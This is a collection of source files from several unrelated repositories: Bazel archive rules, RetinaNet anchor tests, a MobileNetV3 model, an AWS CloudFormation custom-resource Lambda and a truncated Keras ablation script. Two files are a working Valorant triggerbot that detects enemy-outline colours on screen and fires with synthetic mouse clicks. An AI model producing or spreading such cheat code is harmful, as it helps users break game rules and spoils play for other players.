"bucket": attr.string(mandatory = True, doc = "Bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"profile": attr.string(doc = "Profile to use for authentication."),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "s3"),
},
)
gs_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"bucket": attr.string(mandatory = True, doc = "Google Storage bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "google"),
},
)
b2_archive = repository_rule(
implementation = _cloud_archive_impl,
attrs = {
"bucket": attr.string(mandatory = True, doc = "Backblaze B2 bucket name"),
"file_path": attr.string(
mandatory = True,
doc = "Relative path to the archive file within the bucket",
),
"sha256": attr.string(mandatory = True, doc = "SHA256 checksum of the archive"),
"build_file": attr.label(
allow_single_file = True,
doc = "BUILD file for the unpacked archive",
),
"build_file_contents": attr.string(doc = "The contents of the build file for the target"),
"patches": attr.label_list(doc = "Patches to apply, if any.", allow_files = True),
"patch_args": attr.string_list(doc = "Arguments to use when applying patches."),
"strip_prefix": attr.string(doc = "Prefix to strip when archive is unpacked"),
"_provider": attr.string(default = "backblaze"),
},
)
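# Usage sketch for a WORKSPACE file (bucket, path, and checksum below are
# hypothetical placeholders):
#
# load("//:cloud_archive.bzl", "s3_archive")
#
# s3_archive(
#     name = "training_data",
#     bucket = "example-bucket",
#     file_path = "archives/data-v1.tar.gz",
#     sha256 = "<sha256 of the archive>",
#     strip_prefix = "data-v1",
#     build_file = "//third_party:data.BUILD",
# )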
``` |
{
"source": "1e100/keras-retinanet",
"score": 2
} |
#### File: tests/utils/test_anchors.py
```python
import numpy as np
import configparser
from tensorflow import keras
from keras_retinanet.utils.anchors import anchors_for_shape, AnchorParameters
from keras_retinanet.utils.config import read_config_file, parse_anchor_parameters
def test_config_read():
config = read_config_file("tests/test-data/config/config.ini")
assert "anchor_parameters" in config
assert "sizes" in config["anchor_parameters"]
assert "strides" in config["anchor_parameters"]
assert "ratios" in config["anchor_parameters"]
assert "scales" in config["anchor_parameters"]
assert config["anchor_parameters"]["sizes"] == "32 64 128 256 512"
assert config["anchor_parameters"]["strides"] == "8 16 32 64 128"
assert config["anchor_parameters"]["ratios"] == "0.5 1 2 3"
assert config["anchor_parameters"]["scales"] == "1 1.2 1.6"
def create_anchor_params_config():
config = configparser.ConfigParser()
config["anchor_parameters"] = {}
config["anchor_parameters"]["sizes"] = "32 64 128 256 512"
config["anchor_parameters"]["strides"] = "8 16 32 64 128"
config["anchor_parameters"]["ratios"] = "0.5 1"
config["anchor_parameters"]["scales"] = "1 1.2 1.6"
return config
def test_parse_anchor_parameters():
config = create_anchor_params_config()
anchor_params_parsed = parse_anchor_parameters(config)
sizes = [32, 64, 128, 256, 512]
strides = [8, 16, 32, 64, 128]
ratios = np.array([0.5, 1], keras.backend.floatx())
scales = np.array([1, 1.2, 1.6], keras.backend.floatx())
assert sizes == anchor_params_parsed.sizes
assert strides == anchor_params_parsed.strides
np.testing.assert_equal(ratios, anchor_params_parsed.ratios)
np.testing.assert_equal(scales, anchor_params_parsed.scales)
def test_anchors_for_shape_dimensions():
sizes = [32, 64, 128]
strides = [8, 16, 32]
ratios = np.array([0.5, 1, 2, 3], keras.backend.floatx())
scales = np.array([1, 1.2, 1.6], keras.backend.floatx())
anchor_params = AnchorParameters(sizes, strides, ratios, scales)
pyramid_levels = [3, 4, 5]
image_shape = (64, 64)
all_anchors = anchors_for_shape(
image_shape, pyramid_levels=pyramid_levels, anchor_params=anchor_params
)
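# Sanity check on the count: 3 pyramid levels on a 64x64 image give
# 8x8 + 4x4 + 2x2 = 84 locations, each with 4 ratios * 3 scales = 12
# anchors, hence 84 * 12 = 1008 rows.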
assert all_anchors.shape == (1008, 4)
def test_anchors_for_shape_values():
sizes = [12]
strides = [8]
ratios = np.array([1, 2], keras.backend.floatx())
scales = np.array([1, 2], keras.backend.floatx())
anchor_params = AnchorParameters(sizes, strides, ratios, scales)
pyramid_levels = [3]
image_shape = (16, 16)
all_anchors = anchors_for_shape(
image_shape, pyramid_levels=pyramid_levels, anchor_params=anchor_params
)
# using almost_equal for floating point imprecisions
np.testing.assert_almost_equal(
all_anchors[0, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[1, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[2, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[3, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[4, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[5, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[6, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[7, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[8, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[9, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[10, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[11, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[12, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[13, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[14, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[15, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
``` |
{
"source": "1e100/mobilenet_v3",
"score": 3
} |
#### File: 1e100/mobilenet_v3/mobilenet_v3.py
```python
from typing import Tuple, Union
import collections
import torch
from torch import nn
import mobilenet_v3_configs as conf
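# MobileNetV3 swaps sigmoid/swish for cheap piecewise-linear approximations:
# h-sigmoid(x) = relu6(x + 3) / 6 and h-swish(x) = x * h-sigmoid(x).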
def hard_sigmoid(x: torch.Tensor, inplace: bool = True) -> torch.Tensor:
return nn.functional.relu6(x + 3, inplace=inplace) / 6
def hard_swish(x: torch.Tensor, inplace: bool = True) -> torch.Tensor:
return hard_sigmoid(x, inplace=inplace) * x
class HardSwish(nn.Module):
def __init__(self, inplace: bool = True) -> None:
super().__init__()
self._inplace = inplace
def forward(self, x: torch.Tensor) -> torch.Tensor:
return hard_swish(x, inplace=self._inplace)
def _get_activation(activation: str):
if activation == "relu":
return nn.ReLU
elif activation == "relu6":
return nn.ReLU6
elif activation == "hardswish":
return HardSwish
else:
raise ValueError(f"Unsupported activation: {activation}")
# SE and inverted residual are similar to MNASNet, but with MNV3 specific
# tweaks.
class _SqueezeAndExcitation(nn.Module):
def __init__(self, channels: int, se_ratio: float):
if se_ratio <= 0.0:
raise ValueError("Squeeze and excitation depth ratio must be positive.")
super().__init__()
reduced_ch = _round_to_multiple_of(channels * se_ratio, 8)
# Note: official implementation uses bias on SE.
self.reduce = nn.Conv2d(channels, reduced_ch, 1, bias=True)
self.expand = nn.Conv2d(reduced_ch, channels, 1, bias=True)
def forward(self, x: torch.Tensor) -> torch.Tensor:
y = x.mean([2, 3], keepdim=True)
y = nn.functional.relu(self.reduce(y), inplace=True)
return hard_sigmoid(self.expand(y)) * x
class _ConvBnActivationBlock(nn.Module):
def __init__(
self,
in_ch: int,
out_ch: int,
kernel_size: Union[int, Tuple[int, int]],
stride: Union[int, Tuple[int, int]],
padding: Union[int, Tuple[int, int, int, int]],
dilation: Union[int, Tuple[int, int]],
activation: str = "relu",
):
super().__init__()
self.conv = nn.Conv2d(
in_ch,
out_ch,
kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
bias=False,
)
self.bn = nn.BatchNorm2d(out_ch)
self.activation = _get_activation(activation)(inplace=True)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.conv(x)
x = self.bn(x)
return self.activation(x)
class _MobileNetV3Block(nn.Module):
def __init__(
self,
in_ch,
exp_ch,
out_ch,
kernel_size,
stride,
dilation=1,
se_ratio=None,
activation="relu",
allow_residual=True,
):
super().__init__()
assert stride in [1, 2]
assert kernel_size in [3, 5]
activation = _get_activation(activation)
self.apply_residual = allow_residual and (in_ch == out_ch and stride == 1)
# Features are collected from pointwise immediately before the next
# downsampling. If there's no downsampling, we don't keep the features.
self.keep_features = stride > 1
self.se_ratio = se_ratio
if in_ch != exp_ch:
# Pointwise expand.
self.expand = nn.Sequential(
nn.Conv2d(in_ch, exp_ch, 1, bias=False),
nn.BatchNorm2d(exp_ch),
activation(inplace=True),
)
else:
self.expand = None
effective_kernel_size = (kernel_size - 1) * dilation + 1
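# A k-wide kernel with dilation d spans (k - 1) * d + 1 input pixels, so
# padding by half of that preserves the spatial size at stride 1.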
self.dw_conv = nn.Sequential(
nn.Conv2d(
exp_ch,
exp_ch,
kernel_size,
padding=effective_kernel_size // 2,
stride=stride,
dilation=dilation,
groups=exp_ch,
bias=False,
),
nn.BatchNorm2d(exp_ch),
activation(inplace=True),
)
if se_ratio is not None:
self.se = _SqueezeAndExcitation(exp_ch, se_ratio)
# Linear pointwise. Note that there's no activation afterwards.
self.contract = nn.Sequential(
nn.Conv2d(exp_ch, out_ch, 1, bias=False), nn.BatchNorm2d(out_ch)
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
y = self.expand(x) if self.expand is not None else x
if self.keep_features:
self.features = y
y = self.dw_conv(y)
if self.se_ratio is not None:
y = self.se(y)
y = self.contract(y)
if self.apply_residual:
y += x
return y
def _round_to_multiple_of(val, divisor, round_up_bias=0.9):
""" Asymmetric rounding to make `val` divisible by `divisor`. With default
bias, will round up, unless the number is no more than 10% greater than the
smaller divisible value, i.e. (83, 8) -> 80, but (84, 8) -> 88. """
assert 0.0 < round_up_bias < 1.0
new_val = max(divisor, int(val + divisor / 2) // divisor * divisor)
return new_val if new_val >= round_up_bias * val else new_val + divisor
class MobileNetV3(nn.Module):
""" MobileNetV3 model: https://arxiv.org/pdf/1905.02244.pdf
>>> model = MobileNetV3(alpha=1.0, model_type="small")
>>> x = torch.rand(1, 3, 224, 224)
>>> y = model.forward(x)
>>> list(y.shape)
[1, 1000]
>>> y.nelement()
1000
"""
def __init__(
self,
alpha: float = 1.0,
in_ch: int = 3,
num_classes: int = 1000,
dropout: float = 0.2, # Per paper.
model_type: str = "large",
has_classifier: bool = True,
):
super().__init__()
assert alpha > 0.0
self.alpha = alpha
assert in_ch > 0
self.in_ch = in_ch
assert num_classes > 1
self.num_classes = num_classes
assert model_type in conf.CONFIG
self.model_type = model_type
self.has_classifier = has_classifier
config = conf.CONFIG[model_type]
# Scale the channels, forcing them to be multiples of 8, biased towards
# the higher number of channels.
for c in config:
c[0] = _round_to_multiple_of(c[0] * alpha, 8)
c[1] = _round_to_multiple_of(c[1] * alpha, 8)
c[2] = _round_to_multiple_of(c[2] * alpha, 8)
# Build the first layer. It's the same for all networks.
self.input_layer = _ConvBnActivationBlock(
in_ch,
config[0][0],
3, # kernel_size
padding=1,
stride=2,
dilation=1,
activation="hardswish",
)
# Build the bottleneck stack.
body = collections.OrderedDict()
for idx, c in enumerate(config):
in_ch, exp_ch, out_ch, kernel_size, stride, dilation, se_ratio, activation = c
body[f"bottleneck{idx}"] = _MobileNetV3Block(
in_ch,
exp_ch,
out_ch,
kernel_size,
stride,
dilation=dilation,
se_ratio=se_ratio,
activation=activation,
)
# Build the classifier.
shallow_tail = any(x in model_type for x in ["_segmentation", "_detection"])
if "large" in model_type:
last_conv_ch = 960 if not shallow_tail else 480
elif "small" in model_type:
last_conv_ch = 576 if not shallow_tail else 288
else:
raise ValueError("Invalid model type")
if alpha < 1.0:
last_conv_ch = _round_to_multiple_of(last_conv_ch * alpha, 8)
body["last_conv"] = _ConvBnActivationBlock(
config[-1][2],
last_conv_ch,
1,
padding=0,
stride=1,
dilation=1,
activation="hardswish",
)
self.body = nn.Sequential(body)
self.classifier = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Flatten(),
nn.Linear(last_conv_ch, 1280),
HardSwish(inplace=True),
nn.Dropout(p=dropout, inplace=True),
nn.Linear(1280, num_classes),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.input_layer(x)
x = self.body(x)
if self.has_classifier:
x = self.classifier(x)
return x
``` |
{
"source": "1e17/Valorant-Triggerbot",
"score": 2
} |
#### File: 1e17/Valorant-Triggerbot/init.py
```python
import os, ctypes, keyboard, json, mss, PIL, PyQt5, time, sys, threading
from PyQt5 import QtCore, QtGui, QtWidgets
from PIL.Image import frombytes
from ctypes import wintypes
from os import system
# Settings
settings = json.load(open(os.getcwd()+'\\config.json'))
# System Constants
krnl32 = ctypes.WinDLL('kernel32', use_last_error=True)
user32 = ctypes.WinDLL('User32', use_last_error=True)
# Declarations
fovSize = settings['fovSize'] # area range
lenience = 5 # rgb offsets
r,g,b = (200,50,200) # color search
screenWidth, screenHeight = (user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)) #monitor
fov = (int(screenWidth/2-fovSize), int(screenHeight/2-fovSize), int(screenWidth/2+fovSize), int(screenHeight/2+fovSize)) # search area
# Functions
def toggle(): # Enable/Disable
settings['triggerBot'] = not settings['triggerBot']
# Rising tones signal enable; falling tones signal disable.
if settings['triggerBot']:
krnl32.Beep(400, 50)
krnl32.Beep(600, 100)
else:
krnl32.Beep(600, 50)
krnl32.Beep(400, 100)
# KeyBinds
keyboard.add_hotkey(settings['keyBind'], toggle, args=()) # toggle
# Fov Drawing
class FovVisualizer(QtWidgets.QWidget):
def __init__(self):
QtWidgets.QWidget.__init__(self, None)
self.resize(screenWidth,screenHeight)
self.pen = QtGui.QPen(QtGui.QColor(0, 255, 157))
self.pen.setWidth(1)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowTransparentForInput)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
def paintEvent(self, event):
brush = QtGui.QPainter(self)
brush.setPen(self.pen)
brush.drawRect(int(screenWidth/2 - fovSize), int(screenHeight/2 - fovSize), int(fovSize*2), int(fovSize*2))
# Triggerbot
def Triggerbot():
while True:
if settings['triggerBot']:
with mss.mss() as ssobj: # create screenshot object
grab = ssobj.grab(fov) # screenshot
img = frombytes("RGB", grab.size, grab.bgra, "raw", "BGRX")
for y in range(0,fovSize): # y position
for x in range(0,fovSize): # x position
rp,gp,bp = img.getpixel((x,y)) # pixel color
if (r-lenience < rp < r+lenience and g-lenience < gp < g+lenience and b-lenience < bp < b+lenience):
user32.mouse_event(0x0002, 0, 0, 0, 0)
time.sleep(0.005)
user32.mouse_event(0x0004, 0, 0, 0, 0)
break
else:
continue
break
# Trigger Bot
threading.Thread(target=Triggerbot).start()
# Fov Visualizer
if settings['showFov']:
app = QtWidgets.QApplication(sys.argv)
visualize = FovVisualizer();
visualize.show();
sys.exit(app.exec_())
```
#### File: 1e17/Valorant-Triggerbot/revamp.py
```python
import os;
if os.name != 'nt': raise SystemExit
import time
import json
import mss
import ctypes
import sys
from keyboard import add_hotkey
from PIL.Image import frombytes
from threading import Thread as thread
from art import *
from collections import namedtuple
CFG_PTH = 'valorant-config.json'
CWD = os.getcwd()
CLEAR = lambda:os.system('cls')
CFG_EXISTS = os.path.isfile(CWD+'/'+CFG_PTH)
KRNL32 = ctypes.WinDLL('kernel32', use_last_error=True)
USER32 = ctypes.WinDLL('User32', use_last_error=True)
WIDTH, HEIGHT = (USER32.GetSystemMetrics(0), USER32.GetSystemMetrics(1))
CONFIG = CFG_EXISTS and json.load(open(CFG_PTH))
SETTINGS = namedtuple('SETTINGS', ['color','tapShoot','tapShootDelay','fovX','fovY','key','lenience'])
STATUS = False
VALID_COLORS = ['yellow', 'purple']
def setup():
global SETTINGS
global CONFIG
os.system('color b')
"""Create user settings"""
while True:
CLEAR()
print(text2art('SETUP'))
try:
CONFIG = dict([
('color', str(input('Color type (yellow, purple): '))),
('tapShoot', int(input('Tap Shoot (0:true 1:false): '))),
('tapShootDelay', int(input('Tap Shoot Delay (ms): '))),
('fovX', int(input('Fov X size: '))),
('fovY', int(input('Fov Y size: '))),
('key', str(input('Toggle bind: '))),
('lenience', int(input('Color Lenience (recommended 5-20): ')))
])
if (CONFIG['color'] not in VALID_COLORS):
CLEAR()
print('[ERR] Supported colors (yellow & purple)')
time.sleep(5)
continue
if (CONFIG['tapShoot'] not in [0,1]):
CLEAR()
print('[ERR] Select 0 or 1 for tap shoot')
time.sleep(5)
continue
except:
continue
break
config_file = open(CFG_PTH, 'a+')
config_file.write(json.dumps(CONFIG, indent=2))
CLEAR()
print('Finished! Enjoy!')
time.sleep(2)
def toggle():
global STATUS
"""Toggles triggerbot"""
STATUS = not STATUS
if STATUS:
KRNL32.Beep(400, 50)
KRNL32.Beep(600, 100)
else:
KRNL32.Beep(600, 50)
KRNL32.Beep(400, 100)
print('Status: '+ (STATUS and 'Enabled ' or 'Disabled'), end='\r', flush=True)
def main():
global SETTINGS
"""Main Loop"""
if (not CFG_EXISTS): setup()
SETTINGS = SETTINGS(**CONFIG)
LE = SETTINGS.lenience
RGB = SETTINGS.color == 'purple' and (200,50,200) or SETTINGS.color == 'yellow' and (255,255,0)
FOV = (int(WIDTH/2-SETTINGS.fovX), int(HEIGHT/2-SETTINGS.fovY), int(WIDTH/2+SETTINGS.fovX), int(HEIGHT/2+SETTINGS.fovY))
add_hotkey(SETTINGS.key, toggle, args=())
CLEAR();print(text2art('V-BOT'));print('Keybind: '+SETTINGS.key)
while True:
if STATUS:
with mss.mss() as ssobj:
grab = ssobj.grab(FOV)
img = frombytes("RGB", grab.size, grab.bgra, "raw", "BGRX")
for y in range(0,SETTINGS.fovY):
for x in range(0,SETTINGS.fovX):
rp,gp,bp = img.getpixel((x,y))
if (RGB[0]-LE < rp < RGB[0]+LE and RGB[1]-LE < gp < RGB[1]+LE and RGB[2]-LE < bp < RGB[2]+LE):
USER32.mouse_event(0x0002, 0, 0, 0, 0)
time.sleep(0.005)
USER32.mouse_event(0x0004, 0, 0, 0, 0)
break
else:
continue
break
time.sleep(SETTINGS.tapShoot == 0 and (SETTINGS.tapShootDelay*0.001) or 0)
if (__name__ == '__main__'):
main()
# dd
``` |
{
"source": "1earnpy/customresource",
"score": 2
} |
#### File: lambda/python/customresource.py
```python
import json
import logging
import signal
from urllib2 import build_opener, HTTPHandler, Request
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
def handler(event, context):
'''Handle Lambda event from AWS'''
# Setup alarm for remaining runtime minus a second
signal.alarm((context.get_remaining_time_in_millis() / 1000) - 1)
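# If the alarm fires mid-handler, timeout_handler raises inside the try
# block below, so CloudFormation still receives a FAILED response instead
# of waiting on a silently timed-out Lambda.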
try:
LOGGER.info('REQUEST RECEIVED:\n %s', event)
LOGGER.info('REQUEST RECEIVED:\n %s', context)
if event['RequestType'] == 'Create':
LOGGER.info('CREATE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource creation successful!"})
elif event['RequestType'] == 'Update':
LOGGER.info('UPDATE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource update successful!"})
elif event['RequestType'] == 'Delete':
LOGGER.info('DELETE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource deletion successful!"})
else:
LOGGER.info('FAILED!')
send_response(event, context, "FAILED",
{"Message": "Unexpected event received from CloudFormation"})
except: #pylint: disable=W0702
LOGGER.info('FAILED!')
send_response(event, context, "FAILED", {
"Message": "Exception during processing"})
def send_response(event, context, response_status, response_data):
'''Send a resource manipulation status response to CloudFormation'''
response_body = json.dumps({
"Status": response_status,
"Reason": "See the details in CloudWatch Log Stream: " + context.log_stream_name,
"PhysicalResourceId": context.log_stream_name,
"StackId": event['StackId'],
"RequestId": event['RequestId'],
"LogicalResourceId": event['LogicalResourceId'],
"Data": response_data
})
LOGGER.info('ResponseURL: %s', event['ResponseURL'])
LOGGER.info('ResponseBody: %s', response_body)
opener = build_opener(HTTPHandler)
request = Request(event['ResponseURL'], data=response_body)
request.add_header('Content-Type', '')
request.add_header('Content-Length', len(response_body))
request.get_method = lambda: 'PUT'
response = opener.open(request)
LOGGER.info("Status code: %s", response.getcode())
LOGGER.info("Status message: %s", response.msg)
def timeout_handler(_signal, _frame):
'''Handle SIGALRM'''
raise Exception('Time exceeded')
signal.signal(signal.SIGALRM, timeout_handler)
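# A minimal sketch of the CloudFormation event shape this handler consumes;
# every value below is illustrative, not taken from a real stack:
#
# {
#     "RequestType": "Create",
#     "ResponseURL": "https://cloudformation-custom-resource-response.example/callback",
#     "StackId": "arn:aws:cloudformation:us-east-1:123456789012:stack/example/guid",
#     "RequestId": "unique-request-id",
#     "LogicalResourceId": "MyCustomResource"
# }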
``` |
{
"source": "1edv/evolution",
"score": 2
} |
#### File: model/benchmarking_models/ablation_study.py
```python
import sys
sys.path.insert(0, './')
from rr_aux import *
##Clear Memory
tf.reset_default_graph()
tf.keras.backend.clear_session()
gc.collect()
##
NUM_GPU = len(get_available_gpus())
if(NUM_GPU>0) :
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU
print(tf.__version__)
print(keras.__version__)
model_conditions = 'Glu'
# data directory, fixed relative to this script
dir_path=os.path.join('..','..','..','data',model_conditions)
###
sys.argv = sys.argv[1:]
print(sys.argv)
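# Assumed invocation: the layers to ablate are passed as positional arguments,
# e.g. `python ablation_study.py conv1 lstm None`; valid names are listed where
# ablated_layer_list is consumed below.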
## Load the data matrix
with h5py.File(join(dir_path,'_trX.h5'), 'r') as hf:
_trX = hf['_trX'][:]
with h5py.File(join(dir_path,'_trY.h5'), 'r') as hf:
_trY = hf['_trY'][:]
with h5py.File(join(dir_path,'_vaX.h5'), 'r') as hf:
_vaX = hf['_vaX'][:]
with h5py.File(join(dir_path,'_vaY.h5'), 'r') as hf:
_vaY = hf['_vaY'][:]
with h5py.File(join(dir_path,'_teX.h5'), 'r') as hf:
_teX = hf['_teX'][:]
with h5py.File(join(dir_path,'_teY.h5'), 'r') as hf:
_teY = hf['_teY'][:]
print(_trX.shape , _trY.shape , _vaX.shape , _vaY.shape , _teX.shape , _teY.shape)
trX = _trX #np.concatenate((_trX, _trX_rc), axis = 1) #np.squeeze((_trX))#
vaX = _vaX # np.concatenate((_vaX, _vaX_rc), axis = 1) #np.squeeze((_vaX))#
teX = _teX # np.concatenate((_teX, _teX_rc), axis = 1)#np.squeeze((_teX))#
## Load the scaler (it was trained on the synthesized data)
scaler = sklearn.externals.joblib.load(join(dir_path,'scaler.save'))
vaY = (scaler.transform(_vaY.reshape(1, -1))).reshape(_vaY.shape) #_vaY#
trY = (scaler.transform(_trY.reshape(1, -1))).reshape(_trY.shape) #_trY#
teY = (scaler.transform(_teY.reshape(1, -1))).reshape(_teY.shape) #_teY#
### If using generator, have a smaller val set for faster evaluation
if 0:
s_trX = np.vstack((trX , vaX))
s_trY = np.vstack((trY , vaY))
trX = s_trX[1000:,:]
trY = s_trY[1000:,:]
vaX = s_trX[0:1000,:]
vaY = s_trY[0:1000,:]
print(trX.shape , trY.shape , vaX.shape , vaY.shape , _teX.shape , _teY.shape)
input_shape = trX.shape
def fitness_function_model(model_params) :
n_val_epoch = model_params['n_val_epoch']
epochs= model_params['epochs']
batch_size= model_params['batch_size']
l1_weight= model_params['l1_weight']
l2_weight= model_params['l2_weight']
motif_conv_hidden= model_params['motif_conv_hidden']
